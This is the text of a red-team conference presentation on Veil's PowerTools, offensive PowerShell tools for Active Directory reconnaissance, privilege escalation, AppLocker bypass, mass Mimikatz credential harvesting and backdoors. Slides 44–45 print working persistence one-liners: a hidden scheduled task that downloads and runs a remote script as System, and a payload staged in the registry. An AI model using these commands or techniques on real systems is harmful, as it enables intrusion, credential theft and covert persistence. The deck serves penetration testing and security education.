This presentation covers Veil's PowerTools, a set of offensive PowerShell tools. It was presented at CarolinaCon '11 on 3/20/2015.

1. Drilling Deeper
with
Veil’s PowerTools
Justin Warner, Will Schroeder
Veris Group’s Adaptive Threat Division

2. @sixdub
◎Pentester and red teamer for the
Adaptive Threat Division of Veris Group
◎Lots of interest: red team ops, reverse
engineering, adversarial tactics, etc
◎Developer on the Veil-Framework and
co-founder of Veil’s PowerTools

3. @harmj0y
◎Security researcher and red teamer for
the Adaptive Threat Division of Veris
Group
◎Co-founder of the Veil-Framework and
founder of Veil’s PowerTools
◎Cons: Shmoocon, CarolinaCon, Defcon,
Derbycon, various BSides

4. tl;dr
◎Introduction
◎PowerView
◎PowerUp
◎PowerPick
◎PewPewPew
◎PowerBreach
◎Dear M$
◎Demos
◎Questions

5. Introduction
How We Got Here

6. The Veil-Framework
◎An offensive toolkit aimed at bridging the
gap between pentesting and red teaming
capabilities
◎Started with the release of Veil-Evasion
○ expanded with Catapult, Pillage, and
PowerView
◎CarolinaCon 2014 - “The Veil-
Framework”

7. Veil’s PowerTools
◎All of our offensive PowerShell work
from the Veil-Framework (and other
projects) was pulled into the new
PowerTools repo
◎PowerTools will remain the primary
source for all PowerShell work, with the
Veil repo containing offensive Python
projects

8. Sidenote:
Why PowerShell
○ PowerShell provides (out of the box):
□ Full .NET access
□ application whitelisting
□ direct access to the Win32 API
□ ability to execute purely in memory
□ default installation Win7+ !
○ “Why I Choose PowerShell as an Attack
Platform”
□ http://www.exploit-monday.com/2012/08/Why-I-
Choose-PowerShell.html

9. “Bad Guys”

10. “
“Microsoft’s Post-Exploitation
Language”
PowerShell:
-@obscuresec

11. PowerView
Domain Situational
Awareness

12. ◎Think dsquery on steroids... and cocaine
◎First started because a client banned
“net” commands on domain machines
◎Otherwise initially inspired by Rob
Fuller’s netview.exe tool
○ Wanted something more flexible that also didn’t
drop a binary to disk
Background

13. User Hunting
◎Goal: find which domain machines
specific users are logged into
◎Invoke-UserHunter: finds where target
users or group members are logged into
on the network
◎Invoke-StealthUserHunter: extracts
user homeDirectories from AD, gets
sessions on all these file servers to hunt
for targets
○ Significantly less traffic than Invoke-UserHunter

14. Offensive Event Parsing
◎Once you get DA, domain controller
event logs make it trivial to track down
user locations
◎PowerView’s Get-UserLogonEvents
lets you easily extract account logon
events (4624) from a host
◎Invoke-UserEventHunter wraps this all
up into a weaponized form

15. Domain Trusts
◎PowerView can now enumerate and
exploit existing domain trusts:
○ Get-NetDomainTrusts, Get-NetForestDomains
◎Most PowerView functions now accept a
“-Domain <name>” flag, allowing them to
operate across trusts
○ e.g. Get-NetUsers –Domain sub.test.local
◎Invoke-MapDomainTrusts can
recursively map all reachable trusts from
a foothold

17. Data Mining
◎PowerView’s Invoke-ShareFinder -
CheckAccess can find all shares
readable by the current user
◎Invoke-FileFinder can search a network
for open file shares, or take a share list
from Invoke-ShareFinder
◎Spits out a .csv of found files, sortable by
creation or last access times

18. PowerUp
Automating Windows
Privesc

19. Background
◎On past assessments, had to escalate
privileges on a locked down workstation
◎Kernel exploits wouldn’t work, so fell
back to vulnerable service binaries
◎More or less did everything manually,
wanted something a bit easier
○ Started implementing the “Encyclopedia of
Privesc”

20. Windows Services
◎One of the most effective escalation
vectors was (and still is) vulnerable
Windows services
○ Sometimes can modify a service itself
○ Get-ServicePerms will check for these
◎However, many organizations overlook
the permissions for service binaries :)
○ Use Get-ServiceEXEPerms, then overwrite the
service binary to add a local user or install an
agent

21. .DLL Hijacking
◎Many programs/services will search in
multiple locations when loading,
including directories listed in the PATH
environment variable
◎If you have write access to any folder in
PATH, there’s a good chance you can
drop a malicious DLL and escalate
privileges
○ Invoke-FindPathHijack will search for these
opportunities

22. PowerUp
◎Automates everything we’ve talked
about, and more
◎Invoke-AllChecks will run all current
checks against a host
◎Functions exist to abuse most of the
escalation vectors found

23. PowerPick
Lock Picking the
AppLocker

24. Background
◎ Incident responders are recognizing and
targeting PowerShell.exe
○ Had a client write HIPS rules against
psh_psexec, YA, for reals
◎ We wanted to be prepared for more
situations like this
◎ Developed PowerPick as a combination of
solutions to run PowerShell without
powershell.exe

25. Bypassing the Blacklist
◎ Used assemblies in .NET/C# to execute code
○ System.Management.Automation
◎ Developed SharpPick
○ http://www.sixdub.net/2014/12/02/inexorable-
powershell-a-red-teamers-tale-of-overcoming-
simple-applocker-policies/
◎ To defeat with blacklist policy (not ideal), must
permission off or block DLLs in the Global
Assembly Cache (GAC)
○ C:WindowsAssembly*

26. OH BTW

27. Runspaces in Unmanaged Code
◎SharpPick wasn’t very sexy
○ Binary on disk = Lame!
◎Lee Christensen (@tifkin_) authored
“UnmanagedPowerShell” to utilize .NET
assemblies from C
○ Uses CLR and custom .NET assembly in memory
○ https://github.com/leechristensen/UnmanagedPo
werShell
◎Transformed this code into a reflective
DLL = ReflectivePick

28. PowerShell Inception = Injection!!
◎Decided it needed more PowerShell
◎Embedded ReflectivePick into Invoke-
ReflectivePEInjection from Powersploit
by @josephbialek
○ Created Invoke-PSInjector
◎Injects DLL into remote process that
runs PowerShell code

29. ReflectivePick Diagram
*.exe
Invoke-PSInjector
ReflectivePick
.NET Assembly
Download Cradle

30. Invoke-PowerCeption?

31. PewPewPew
Launching Lazerz at
your Targets

33. Invoke-Mass*
◎Model to run PowerShell scripts on a
mass number of machines and retrieve
results:
1. A jobbified webserver is kicked off in the
background which serves out a specified
PowerShell file
2. A IEX() one-liner is executed on machines
through WMI to download/executed the
hosted code
3. Results are POSTed back to the local
webserver

34. Invoke-MassMimikatz
◎Executes PowerSploit’s Invoke-
Mimikatz on multiple machines without
PSRemoting
◎Raw Mimikatz results are saved on the
pivot host
◎Result files are parsed and
Server:Credential objects are output to
the pipeline

35. Invoke-MassMimikatz

36. Invoke-MassSearch
◎Microsoft has another gift for attackers,
the Windows Search Indexing Service
○ Why search through all of a system’s file when
Windows does this for you?
◎Invoke-MassSearch performs the same
pattern as Invoke-MassMimikatz
○ allows you to query the search indexer across
machines where you have admin access

37. PowerBreach
New Release

38. Background
◎One obvious gap remaining in workflow
of Veil PowerTools
◎Motivation: offense in depth theory
◎Wanted multiple easy ways to remain
resident on the compromised systems
○ Memory only

39. PowerBreach
◎Yes… More PowerShell
○ Why not utilize our favorite scripting language?!
◎Goal: automate a bunch of
techniques/tools to backdoor a system
◎Multiple triggers, various host/network
signatures
○ We will show some of the “cool” ones

40. Invoke-EventLogBackdoor
◎Based on Shmoocon 2013 “Wipe The
Drive” by Jake Williams
(@MalwareJake)
◎Uses Get-WinEvent to monitor windows
event logs for failed RDP attempts
◎When it recognizes “trigger” username,
phones home to attacker
○ With an IEX(...) download cradle

41. Invoke-PortKnockBackdoor
◎Based upon Get-Packet by Robbie
Foust http://blog.robbiefoust.com/?p=68
○ Uses system.net.sockets.socket to create raw
socket
○ Uses socket.iocontrol to make promiscuous
◎Promiscuously sniffs traffic on system
and inspects data for “magic” trigger
value
○ UDP, TCP, ICMP

42. Invoke-DeadUserBackdoor
◎Common action of attackers is to add
domain/local users
◎Uses ADSI to monitor for a users
existence
◎If the user is not found, assumes the
worst and phones home

43. Invoke-ResolverBackdoor
◎Attempts to be a little stealthier and
usable on external assessments
◎Resolves specified DNS name on
interval and if the resolution doesn’t
equal a predefined IP...
◎… PHONE HOME TO THAT IP!

44. Persistence… If you must
◎Focuses more on non-persistent
backdoors
◎Schedule tasks seem to work really well
for PowerShell in domain networks
schtasks /create /tn OfficeUpdater /tr
"powershell.exe -w hidden -NonI -nop -c 'IEX
((new-object
net.webclient).downloadstring(''http://server/scri
pt.ps1'''))'" /sc onlogon /ru System

45. Registry Storage
◎Better yet, stage your script in the registry!
$backdoor = "write-host 123”
Set-ItemProperty -Path 'HKLM:HARDWARE' -Name
'secret' -Value $backdoor
schtasks /create /tn Updater /tr "powershell -c 'IEX (gp
HKLM:HARDWARE secret).secret'" /sc onlogon /ru
System

46. So what?
◎Nothing revolutionary here!
◎Nothing worse than owning a system
and not being able to get back on later!
◎Real power comes when combining
PowerTools
○ PewPewPew with PowerBreach

47. 2 Cents
Almost ready for the show!

48. Obligatory Defense Slide
◎HIPs and Whitelisting generally help
endpoint defense
◎Enterprise incident response capabilities
○ Memory only capabilities but scripts (“malware”)
able to be easily recovered and analyzed
◎Need a clear way to restrict PowerShell
& .NET assemblies to certain users

49. True Story…

50. Demos

51. Questions?
◎Justin
○ @sixsub
○ http://www.sixdub.net/
○ justin [at] sixdub.net
◎Will
○ @harmj0y
○ http://blog.harmj0y.net/
○ will [at] harmj0y.net
◎https://github.com/veil-framework/PowerTools